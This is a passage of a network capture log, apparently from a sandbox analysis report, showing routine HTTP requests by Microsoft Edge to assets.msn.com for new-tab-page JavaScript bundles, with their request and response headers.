akamai-request-id: 19b9d600
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/profile-promo-card.1f073e45985a917c3289.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/profile-promo-card.1f073e45985a917c3289.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: WzEYcR+4f1bjp7gtp63sSg==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF68A2B4F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6f1545df-101e-0071-795d-14d49a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609449,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d669
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/promoBannerWC.ebb1901dc6fb5f35d1d3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/promoBannerWC.ebb1901dc6fb5f35d1d3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: LGBp0dIJdQ1XpzW5gKRg5Q==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C16932DA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0595e094-b01e-00bb-2cc7-165ecb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609538,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d6c2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/publisher-carousel.b8332e3891c891eaceb5.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/publisher-carousel.b8332e3891c891eaceb5.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: f6UprH4ezYQ9SzyQmctQ7Q==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C207A598
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dfc4895a-001e-0054-6747-19c2a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609594,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d6fa
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/publisher-subscribe-follow-button.c6313c738db2d45998a0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/publisher-subscribe-follow-button.c6313c738db2d45998a0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: DIYwuyzBARyYZ0GNKdbpEQ==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6F51276
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8529f77c-f01e-002b-705a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609687,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d757
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/qna-card.ec744bc4c978026b4055.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/qna-card.ec744bc4c978026b4055.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I/HVt7RhxH5WtxWEGELsSQ==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB07A156E40
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 210e2995-f01e-003b-559a-11099e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609766,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d7a6
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/quiz-card.155dba45d34d64065dda.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/quiz-card.155dba45d34d64065dda.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: zAY3E45gkYshn/rlwZUecg==
last-modified: Tue, 20 Dec 2022 05:42:24 GMT
etag: 0x8DAE24CF87F224B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3dbc6d0-101e-00f5-4c5a-142fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609825,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d7e1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/reaction-breakdown-dialog.9508ba4851df55af4e47.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/reaction-breakdown-dialog.9508ba4851df55af4e47.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: E+ovrXAnDvJc2polQ+LdAA==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C2EA434D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 141babac-f01e-002b-5747-19b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609894,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d826
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/real-estate-card.06e01fe7aa21c776a190.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/real-estate-card.06e01fe7aa21c776a190.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6oYEKnAQ/dI9dDlY5HsOag==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5BAC4B1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fa07b7be-d01e-0029-5461-14efb8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609996,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d88c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/recipes-sd-card.2473a0f04be920d6a895.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/recipes-sd-card.2473a0f04be920d6a895.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: TudFjaC444YNok7t4SjLSg==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF770E720
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f90ec-901e-0001-1b5a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610040,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d8b8
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-interests.8336a25fc2f55ad6f94b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/recommended-interests.8336a25fc2f55ad6f94b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ceKB5fK0CxPf4+ApVtIutw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7FCBEEE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a994ce0e-301e-00cb-6f5b-14accb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610182,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d946
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-search-carousel-wc.3098cafab71ed7994845.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/recommended-search-carousel-wc.3098cafab71ed7994845.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: WONgaWa7Vo0b5Q0ik0YJDA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7872AF8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45ce1774-f01e-0043-5050-14a38f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610263,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d997
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-searches-card.4a8a81a2eb5af9c5e93f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/recommended-searches-card.4a8a81a2eb5af9c5e93f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: oxNA3e/JBuarX7DMpAveeg==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB07936EEA6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4a52e229-801e-0070-2aff-13ff98000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610321,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d9d1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/recommendedSites-wc.f505824e537fe2c30da3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/recommendedSites-wc.f505824e537fe2c30da3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 8xmHESAdG6NQAwVP6w2SrQ==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB07A003BB3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c5ea05ed-301e-009f-3b0c-1463f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610462,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9da5e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/rewards-card-wc.0be4be65d6dbcc2b4646.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/rewards-card-wc.0be4be65d6dbcc2b4646.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: at4cKUzy3kv+BSinZzRIvg==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF8302374
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8529ff1b-f01e-002b-3f5a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610518,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9da96
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/rewards-daily-set-card.f357b64200b27dc1722c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/rewards-daily-set-card.f357b64200b27dc1722c.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: WNJx1WoHHVlR+bOeNzmq2A==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB07966AA35
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f0751b18-601e-00ea-6aff-1316fa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610637,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9db0d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sd-card-mask-wc.a349a0a797d81f5c893f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sd-card-mask-wc.a349a0a797d81f5c893f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: eBIbntQwcW1eWB2zhepm7A==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF54F1A50
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 854376e3-f01e-002b-6e5c-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431610763,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9db8b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
